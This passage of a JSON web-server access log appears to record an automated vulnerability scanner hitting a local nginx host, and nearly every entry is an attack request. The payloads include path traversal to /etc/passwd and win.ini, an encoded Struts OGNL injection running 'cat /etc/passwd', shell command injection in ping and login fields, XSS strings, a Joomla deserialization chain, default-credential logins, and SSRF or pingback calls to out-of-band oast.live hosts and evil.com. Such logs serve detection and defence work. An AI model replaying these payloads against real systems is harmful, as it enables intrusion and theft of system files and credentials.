/cms/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /install HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.430","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /awstats.pl HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"username=admin&password=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.454","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.413","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.470","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /web/xml/webuser-auth.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.440","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.623","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /logs/awstats.pl HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /gotoURL.asp?url=google.com&id=43569 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.307","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.252","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.321","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.140","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.427","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/altair HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.786","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"\x0D\x0A pingback.ping\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://c9oms3gsmpve1ijt0mc04nhd4hpaixaaa.oast.live\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A http://127.0.0.1/?p=1\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.385","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.394","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Partners/application/configs/application.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"userName=admin&password=123456","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wabam HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /s/28fHqW6VNdFl4d16MQk7a5N7qnQ/_/;/WEB-INF/web.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/68 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"op=login&username=;`cat /etc/passwd`&password=\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"127.0.0.1/module/login/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/api/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.275","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.413","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /maint/index.php?packages HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\x22>","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.290","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c9oms3gsmpve1ijt0mc0gywdjzo3imdmh.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.399","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:17 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webstats/awstats.pl HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.797","http_user_agent":"Mozilla/5.0 